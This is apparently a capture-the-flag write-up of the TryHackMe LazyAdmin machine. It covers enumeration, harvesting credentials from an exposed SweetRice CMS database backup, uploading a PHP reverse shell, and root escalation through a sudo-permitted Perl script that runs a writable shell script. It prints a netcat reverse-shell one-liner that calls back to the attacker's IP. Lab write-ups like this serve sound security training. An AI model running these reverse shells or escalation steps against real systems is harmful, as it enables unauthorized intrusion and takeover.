LazyAdmin is a machine available on TRYHACKME, designed for those looking to hone their skills in a controlled environment. This box provides opportunities to delve into web application exploration, exploit a documented CVE within a CMS, and understand a fundamental privilege escalation technique.
Key Takeaways
-
Enumeration: Systematic exploration to identify open ports, active services, and directories. Tools like Nmap and GoBuster are vital.
-
Web Application Exploration: Investigating web apps can reveal underlying CMS systems and potential vulnerabilities.
-
Credentials Extraction: Stored data, especially in SQL files or other databases, can sometimes have plaintext or hashed credentials. Tools like hashcat or online platforms like crackstation can assist in deciphering them.
-
Privilege Escalation: Investigate user privileges to identify escalation paths. Always inspect scripts or commands that can be executed with elevated permissions.
-
Persistence & Patience: In cybersecurity and penetration testing, methodical and patient exploration often yields the best results.
Scanning and Enumeration
I began the process by initiating an Nmap scan to detect open ports. The scan results revealed two active ports that I could potentially work with.
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: | 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Given that an HTTP service was detected, I opted to launch GoBuster to assist in enumerating directories. This approach aimed to uncover any hidden paths or resources on the web server.
└─$gobuster dir --url http://10.10.80.64 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Our initial exploration led us to the discovery of a /content directory. Upon investigating, it revealed a SweetRice CMS setup. For context, SweetRice is an open-source content management system primarily designed for uncomplicated websites and blogs. The platform prioritizes user accessibility, offering features like straightforward management tools, theming options, and support for plugins.
Finding the Exploit
Upon inspecting the platform, the version number of SweetRice isn’t immediately visible. To navigate this, I turned to SearchSploit to unearth any known vulnerabilities associated with SweetRice.
A few vulnerabilities stood out to me, particularly those linked to version 1.5.1. I thought that if these issues were present in 1.5.1, they could also exist in later versions. At first, I wanted to try the file upload vulnerability, but it needed a username and password. Checking out 40718.txt, I found the following details:
Proof of Concept : You can access to all mysql backup and download them from this directory.
http://localhost/content/inc/mysql_backup/
Examination
Going to the path, which had /content added in our case, I found a downloadable .SQL file.
When I looked through this file, some lines stood out to me:
{s:4:\\"name\\";s:25:\\"Lazy Admin's Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:
Inside the file, there’s both a username and a corresponding hashed password.
To discern the type of hash, I utilized hashid. With the hash type identified, tools like hashcat can be employed to crack it. Alternatively, online utilities such as crackstation offer a convenient avenue to decrypt such hashes. Armed with these credentials, our next move is clear.
Revisiting the results from the earlier directory discovery, I observed:
http://10.10.193.49/content/as/
Navigating to the specified directory, there’s a distinct login portal. I entered the credentials previously derived, and was successfully authenticated.
Pwning the CMS
Upon logging in, the CMS version became clearly visible, further clarifying the potential vulnerabilities we might exploit.
With this version information at hand, I revisited SearchSploit, narrowing down my focus on Sweetrice. Among the entries, 40700.html caught my attention. Upon closer inspection, it detailed an approach to upload arbitrary files into the web application.
Understanding this vulnerability, I decided to exploit it. I went to the “Ads” section of the CMS, aiming to upload a reverse shell to establish a deeper connection with the system. For this purpose, I employed the well-known reverse shell script by pentestmonkey.
Before activating the reverse shell by accessing the reverse_shell.php link, I prepared my system to receive the incoming connection. To do so, I set up a netcat listener on the appropriate port. This ensures that once the reverse shell is triggered, there’s a waiting connection to receive and interact with it.
─$ nc -nlvp 31337 listening on [any] 31337
... connect to [10.13.18.79] from (UNKNOWN) [10.10.193.49] 54058
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
07:52:03 up 1:31, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
Upon establishing the connection, I found myself logged in as the ‘www-data’ user. While this is a low-privileged user, in this instance, it was sufficient to access the necessary directories and retrieve the flag. I navigated to the /home/itguy directory, and there, I located the root flag. I extracted its contents and was ready to submit the solution.
THM{63e5bce9271952aad1**************}
Root Flag
Upon gaining access as the ‘www-data’ user, my immediate next steps typically involve enhancing my shell environment and reviewing user privileges. Upgrading the shell ensures a more interactive and user-friendly experience. This can be achieved using various methods like the Python tty spawn technique. Once the shell is upgraded, it’s prudent to check for any sudo permissions associated with the current user. Running ‘sudo -l’ will provide insights into commands the current user can execute with superuser privileges, often revealing potential avenues for privilege escalation.
└─$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@THM-Chal:/$
sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
When given the ability to run specific scripts or commands as another user, especially with sudo, it’s essential to inspect the content and permissions of the file in question. This can often reveal potential vectors for privilege escalation.
4 -rw-r--r-x 1 root root 47 nov 29 2019 /home/itguy/backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
The file is owned by root and calls a Perl script that runs /etc/copy.sh, so we investigate that file next.
4 -rw-r--rwx 1 root root 79 Sep 1 08:13 /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.18.79 5554 >/tmp/f
After modifying the backup.pl script to include your specific IP and port details, it’s essential to set up a listener on your end to catch the reverse shell once the script is executed.
Once everything is configured, execute the script, and you should receive a reverse shell connection on your listener, granting you escalated privileges. With this elevated access, you can further explore the system, access restricted directories, and retrieve any required flags or data.
listening on [any] 5554 ...
connect to [10.13.18.79] from (UNKNOWN) [10.10.193.49] 55796
# cat /root/root.txt
THM{6637f41d0177b6f37c**************}$
Concluding our journey through the LazyAdmin box, we successfully captured the root flag. This exercise underlined the importance of thorough enumeration, understanding the nuances of a CMS, and leveraging known vulnerabilities.
Summary
LazyAdmin, featured on TRYHACKME, offers enthusiasts a platform to sharpen their penetration testing skills. From web app exploration to harnessing a CMS’s documented vulnerability and mastering a classic privilege escalation, LazyAdmin covers it all.
1. Enumeration Phase:
- A primary Nmap scan showcased an HTTP service, making it the starting point.
- Directory discovery with GoBuster led to the unearthing of a /content directory, where the SweetRice CMS was spotted.
2. Exploiting the CMS:
- With SweetRice’s version discreet, SearchSploit was employed to pinpoint vulnerabilities, revealing potential breaches in version 1.5.1.
- Delving into an identified vulnerability, an SQL file accessible via /content revealed plaintext credentials.
- Logging into the CMS using these credentials, the platform’s version was evident. Revisiting SearchSploit, a relevant exploit was found that allowed the upload of a reverse shell.
- By setting up a netcat listener and triggering the reverse shell, a connection as the ‘www-data’ user was established, enabling the user flag extraction.
3. Privilege Escalation:
- Post initial shell access, it’s advisable to upgrade to a more interactive shell, say using the Python tty technique.
- Checking user privileges revealed potential privilege escalation through a Perl script.
- Careful scrutiny of the script and related files highlighted a pathway to elevate privileges.
- After necessary configurations and by running the script, a reverse shell with escalated rights was received. With this elevated access, the coveted root flag was in grasp.
Conclusion: LazyAdmin proves that the foundational steps of penetration testing – enumeration, exploitation, and escalation – when done methodically, can pave the way to success. Always remember, in the cybersecurity realm, patience and persistence go hand in hand. Embrace every challenge as a learning opportunity and march towards the next!